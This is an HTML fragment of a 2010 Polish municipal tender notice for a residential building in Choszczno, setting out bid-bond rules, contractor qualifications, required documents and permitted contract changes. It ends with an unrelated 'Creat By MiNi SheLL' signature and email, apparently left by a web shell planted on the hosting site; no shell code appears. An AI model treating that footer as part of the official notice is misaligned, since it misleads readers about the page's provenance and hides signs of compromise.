Budowa wielorodzinnego budynku mieszkalnego z infrastrukturą towarzyszącą w miejscowości Choszczno wraz z zapewnieniem finansowania wykonanych prac do końca roku 2021
Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
4.	Wadium może być wnoszone w formie: poręczenia bankowego, poręczenia pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed?siębiorczości, które należy w formie nienaruszonego oryginału zdeponować u Pani Marty Deseckiej, Urząd Miejski w Choszcznie, pok. 27, a kopię załączyć do oferty.
5.	Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy P.z.p. 
6.	Treść gwarancji wadialnej musi zawierać następujące elementy:
a)	nazwa i adres Zamawiającego;
b)	określenie przedmiotu zamówienia;
c)	nazwę i adres Wykonawcy.
7.	Wadium musi być wniesione nie później niż do  wyznaczonego terminu składania ofert. 
8.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
9.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
10.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
11.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do wnoszenia.
12.	Zamawiający będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w sytuacji, jak w pkt. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
13.	W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. dwóch robót budowlanych polegających na budowie wielorodzinnego budynku mieszkalnego o powierzchni zabudowy nie mniejszej niż 1200 m2 netto każdy, 
b)   wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia, przez co należy rozumieć, że podmiot ten będzie uczestniczył w realizacji zamówienia albo przekaże wykonawcy - na czas realizacji zamówienia, kadrę kierowania budową posiadającą wiedzę i doświadczenie w realizacji zamówienia ( wg pkt. 2) lit. a ) SIWZ,	Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. Szczegółowo dział VI, ust. 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponować narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do realizacji zamówienia, Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. Szczegółowo dział VI, ust. 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kierownik budowy o specjalności konstrukcyjno - budowlanej -  wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie pełnym bez ograniczeń
Kierownik robót o specjalności drogowej -  wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie pełnym bez ograniczeń
Kierownik robót branża sanitarna - wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie pełnym bez ograniczeń
Kierownik robót elektrycznych - wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie pełnym
Geolog nadzoru - posiadający kwalifikacje uprawniające w zakresie nadzorowania robót hydrogeologicznych oraz dokumentowania zasobów wód podziemnych,
Kierownik wierceń - posiadający kwalifikacje średniego dozoru wiertniczego potwierdzone przez Okręgowy Urząd Górniczy.
Osoby te muszą posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Inżynierów Budownictwa, Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. Szeegółowo dział VI, ust. 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia; Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. Szczegółowo dział VI, ust. 3 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.W celu stwierdzenia, czy osoba podpisująca oświadczenia woli lub udzielająca pełnomocnictwa posiada do tego uprawnienia, do oferty należy załączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( dotyczy również osób podpisujących dokumenty z ramienia banku- konieczne przedstawienie dokumentu potwierdzającego uprawnienia tej osoby do reprezentowania banku, np. kserokopia odpisu KRS, pełnomocnictwo)
2.W przypadku wykonawców wspólnie ubiegających się o zamówienie, do oferty należy załączyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 
3.Oświadczenia o:
a) udzieleniu okresu odpowiedzialności z tytułu rękojmi za wady wykonanych robót  na 36 miesięcy, a na zainstalowane urządzenia gwarancji zgodnie z gwarancją udzielaną przez producenta lub dostawcę, ale nie krócej niż 24 miesiące i liczy się od dnia dokonania końcowego odbioru przedmiotu umowy,
b) zobowiązaniu do uporządkowaniu terenu po zakończeniu robót,
 c) zobowiązaniu do sporządzenia dokumentacji powykonawczej ( jeżeli będzie taka potrzeba ),
d) wykonaniu powykonawczej inwentaryzacji geodezyjnej, 
e) zaakceptowaniu warunków rozliczenia określonych w rozdziale IV ust. 4.
4.Harmonogram rzeczowo - finansowy realizacji i rozliczania wykonanych robot 
       opracowany przez Wykonawcę,
5 Kosztorys ofertowy opracowany metodą uproszczoną wraz z zestawieniem cen jednostkowych materiałów, czynników produkcji tj. stawka rbh, kosztów pośrednich, kosztów zaopatrzenia i zysku oraz stawki jednostkowej pracy podstawowego sprzętu i urządzeń, które wykonawca będzie używał do wykonania przedmiotu zamówienia.
7Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania podwykonawcom.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument potwierdzający prawo wykupu wierzytelności, tj. promesa banku lub   umowa pomiędzy bankiem a Wykonawcą, lub zaświadczenie banku potwierdzające wykup wierzytelności. Powyższy dokument nie może mieć charakteru intencyjnego. Dokument ten musi jednoznacznie wykazać zobowiązanie banku do wykupu wierzytelności objętej niniejszym zamówieniem. Harmonogram spłaty wykonanej inwestycji - załącznik Nr 4 SIWZ, 
Kopia dowodu wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
1)	Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie ,jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2)	Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
a)	śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b)	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających   z umowy.
3)	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
4)	Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
5)	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)	przekazania terenu budowy,
b)	przekazania dokumentacji budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych,  innych wymaganych przepisami, do których zamawiający był zobowiązany),
c)	przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczanej dokumentacji projektowej,
d)	zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
e)	zmiany terminu dokonania odbiorów przewidzianych w umowie.
6)	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a)	zawieszenia robót przez Zamawiającego,
b)	wykopalisk uniemożliwiających wykonanie robót,
c)	szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
d)	siły wyższej, klęski żywiołowej
e)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub dających się przypisać Zamawiającemu lub innemu  wykonawcy zatrudnionemu  przez Zamawiającego na terenie budowy,
f)	  niewypałów i niewybuchów,
g)	wykopalisk archeologicznych nieprzewidywanych w siwz,
h)	odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych (kategorie gruntu, kurzawka  itp.),
i)	 odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności  istnienie  podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych,
j)	  zmiany się w trakcie wykonywania umowy przepisów, norm lub normatywów mających zastosowanie do przedmiotu  umowy, lub tych zmian dokona Zamawiający,
k)	jeżeli jednostki administracji nie zachowają wymaganych zgodnie z obowiązującymi przepisami terminów odpowiedzi na wnioski, 
7)	Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego , w szczególności :
a)	wstrzymanie robót przez  Zamawiającego,
b)	konieczności  usunięcia błędów lub wprowadzenia zmian w dokumentacji  projektowej.
8)	Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
b)	odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
9)	Jeżeli powstały konieczne zmiany  technologiczne, w szczególności :
a)	konieczności zrealizowania  projektu  przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,
b)	odmienne od przyjętych w dokumentacji  projektowej  warunki  geologiczne   (kategorie gruntu, kurzawa itp.) skutkujące  niemożliwością  zrealizowania przedmiotu umowy  przy dotychczasowych założeniach  technologicznych,
c)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych  urządzeń instalacji  lub  obiektów infrastrukturalnych,     
d)	konieczności zrealizowania projektu przy  zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
Zmiany wskazywane w lit d) będą wprowadzone wyłącznie w zakresie  umożliwiającym  oddanie przedmiotu  umowy do użytkowania, a  Zamawiający  może ponieść ryzyko zwiększanym z tego powodu  kosztom. Każde ze wskazanych  w lit. a -d  zmian  może  być powiązane ze zmianą  wynagrodzenia na zasadach określonych  przez strony.
10)	Pozostałe zmiany 
a)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
b)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
c)	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługujące  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowanymi  świadczeniami,
d)	kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w specyfikacji i ofercie wykonawcy,
4. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
5. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inżynier Kontraktu oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.choszczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Choszcznie, ul. Wolności 24, 73-200 Choszczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 10:00, miejsce: kancelaria ogólna Urzędu Miejskiego w Choszcznie, ul. Wolności 24, 73-200 Choszczno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com